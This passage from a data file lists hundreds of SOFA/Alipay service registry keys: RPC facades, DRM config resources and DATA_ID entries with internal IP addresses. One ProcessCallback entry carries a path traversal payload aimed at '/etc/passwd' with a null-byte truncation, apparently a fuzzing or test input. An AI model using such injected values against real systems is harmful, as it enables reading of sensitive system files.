T#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.fc.arcore.degrade.whit.list.filterVersions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicore.common.service.facade.client.api.ClientInfoOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acccenter.common.service.facade.inner.ProductKpiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.fund.facade.api.DepositSignCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.InstitutionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.common.service.facade.trace.TraceQueryRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zonemng.facade.api.PartitionRuleOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.insmobileTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.livetradeprod.service.facade.api.ResultPageRenderSpiFacade:1.0:mobilepromo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.creativecenter.openapi.MaterialManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.155.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_FINSKYEYE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.edeductcenter.common.service.facade.v2.EdeductSignFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.maxAllowSelectStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_mobile_sim@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.smartdelivery.common.service.facade.spi.DeliveryDecisionSpi:1.0:apsmartgrowth_deliveryDecisionSpi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antinvoice.biz.flow.generalInvoice.GeneralTopInvoiceAPIClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.sasYebFreezeTimeoutMinutes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxBizExchangeTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.admin.AdminUserAppValidFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.channelquery.ChannelStatusQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.biz.process.CpInfoProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.sp.policy.PolicyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.common.SystemParamServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.comprehensive.insmobile.evaluateAppDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-loanpromotwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.execute.DataExecuteDriver:1.0:instpayDataExecuteDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:rosepay#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cifprocess.publish.service.CoordinateMessageService:1.0:idcenter_check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.clientBillCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.tradeapcore.tradeapcore_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.mwalletmng_mwalletmng_dataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.commodity.MerchantShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.112.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.46.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acdoccore.common.service.facade.conf.FaqConfManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebcore.common.facade.distributor.DistributorFreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopenscene.facade.camphome.facade.CampHomeRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.agreement.general.PcreditContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.needSucContractNumFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secudownload.common.service.facade.heatmap.service.HeatMapService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.SceneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.lineage.DatabusLineAgeHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.CharityAccountQueryService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ismonitor.common.service.facade.censor.SheetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.report.common.service.facade.api.outline.OutlineReportOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.prod.common.service.facade.api.content.ContentProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.darwin.common.service.facade.api.AnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.DrmAccountZoneModeConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotonemng.common.service.api.GotonePushTemplateCreateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.tenant.CapProfileService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linku.common.service.facade.acl.AclFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fporgassetprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_M_FINFOSERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.tairExpireBaseTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:envmap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.inclusionconf.facade.service.ticket.TicketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipass.service.facade.PassManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.trafficMonthRouteStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.contentv2.ContentSceneSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mwalletmng.sharedataReadDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.service.CapitalPlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcmerchantprod.facade.hbpoint.HbPointActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.invoicecommercial.facade.api.FeeChargeSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:huanyu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.common.service.integration.oss.OSSStore:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.core.service.repository.SingleItemClassRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.83.247#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.service.facade.PackageFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.inspect.IdCaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.z.did.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.miniappservice.MiniAppKeywordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.186.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundcardprod.common.service.fundcard.FundCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ireserve.facade.api.BlockchainServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.statusbar.common.service.query.StatusbarQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmOutImgTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.123.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appstore.common.service.facade.commodity.CommodityOrderManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdAbilityFacade:1.0:ismonitor_displayAppQueryFacadeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.recalModifiedDate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bpaas.ecomerchant.facade.shop.ShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.13.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.api.UserProfileByMonthFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:iothub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CertifyLimitService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mmportal:name=com.alipay.dwebupload.client.drm.DomainConfig.downloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alibaba.dataphin.schedule.operation.platform.facade.operation.NodeOpsApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.unitradeprod.common.facade.service.OrderPaymentFacade:1.0:unitradeprodutc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdecision.service.PcreditAuthConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finnet.service.drm.ChannelFilterDRM.influxHoldTimeRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cxbiz.membersolution.common.service.facade.api.member.MemberCardTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.productSegementCutToDw,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finannafccore.common.service.facade.teaching.api.TeachingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.74.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openaccess.facade.service.check.AccessOrderDataCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_ZPDCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.172.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yebplus.common.facade.service.api.query.YebsChargeLimitQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrenewprod.common.service.facade.api.continuous.InsContinuousCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.campcode.CampCodeManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.mark.DatasetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.refreshModel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:uniqueForecastTaskExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcgotonemng_revoke@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcapplycore.common.service.facade.config.InfoExchangeCtrlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.during.InvestDdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.mpoint.facade.MpointFlowinSimpleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.gotone.SendMessageServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.cide.common.service.facade.api.PipelineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.IssueStatisticFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.riskmngTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.staff.common.service.facade.CommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.isv.IsvMerchantBatchChangeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fin.pdcore.common.service.facade.adapter.rfm.AdapterRfmProductQueryFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insleads.common.service.facade.admin.InsLeadsStrategyConfigFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.goldetfprod.common.service.facade.api.GoldPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisoropen.common.service.facade.api.AssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskdatacenter.service.facade.quota.ZappinfoQuotaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.fund.facade.api.InstQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepboss.common.service.facade.WalletOpenInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.policysearch.api.PolicyStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.sortIdOpenStatusCheckList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileic.common.adapter.prod.voice.VoiceProdClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.velocity.DimensionScriptValidateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.qc.AssetDispositionOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianquery.digestquery.common.service.PolicyBalanceDetailDigestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_GOTONE_CACHE_REFRESH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antgroup.zmxy.zmcustcore.common.service.facade.api.CreditReportMpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.AscriptionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.quality.rpc.facade.FeedbackTopicAnswerCallbackFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.test.demo.SampleService:1.0:C1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publictest.facade.project.ProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finstore.common.service.facade.finservice.FinServiceDeliverQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cifprocess.task.remote.handler.RemoteTaskHandler:1.0:cif-cache-preload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.checker.CheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_FDP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.isupergwmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bluearmyprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP-F-SC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cifin:name=com.alipay.cifin.core.service.component.drm.LDCCacheSyncSwitchDrmResource.compareMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.normalapp:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","YamlTestApi14Service:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundbankcore.common.service.facade.FundBankPurchaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fixedDeposit2_SysCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datariskmarket.facade.RmVerifyMetaDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxlib.core.change.spi.manage.ChangeManageSpi:1.0:slaConfigInfostudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeadapter.largeInfinite.common.service.facade.api.LargeInfiniteProductServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.analysis.AdalaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.116.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.baoxianprodfactory.common.service.InsProductMgtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsccalipay.jiebei.facade.service.JieBeiTempCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zskynet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.common.service.AbMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartsql.service.facade.blink.controller.BlinkProxyController#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctransquery.common.service.facade.api.VoucherAccountLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.BizInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.biz.message.ws.MessageSubscribeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.plugincenter.facade.AsyncBatchReleaseService:1.0:imobileplugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.CardAccountRefundOrderQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.ActionMappingRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.alsc.item.AlscInventorySyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers__NOTIFYTEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.spcenter.facade.account.SpAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.fraudmng:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.tairHitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frdecision.common.service.facade.api.EventRecordDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.129.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acpmpcore.common.service.facade.QuestionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_BIll_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finasmcore.common.service.integration.promokernel.PrizeBudgetQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.AccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.recon.common.service.facade.api.RevokeDiscrepancyItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.salesplan.SalesPlanQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.eworkcard.EntProductStateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.SendInvoiceFileForEmailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.bot.facade.card.BotCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.timeoutcallback.TimeoutCallbackGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.dweg.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbreservationprod.common.service.facade.reservation.PromoReservationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:poscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.246.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.tradeexprod:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskmng.common.service.facade.api.ComplainMobileRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZFEECLCN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.OfflineTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/../../../../../../../etc/passwd\u0000-txt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:paygrowth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insinformcore.common.service.facade.std.api.config.QuestionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mpaasweb.common.service.facade.replays.LogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.publiccore.common.service.facade.recommend.LifeServiceCategoryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.marketing.LifeMarketingItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mremindprod:name=com.alipay.mremindprod.common.ldc.MRemindProdLdcDrmConfig.supportLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ptcore.common.service.facade.api.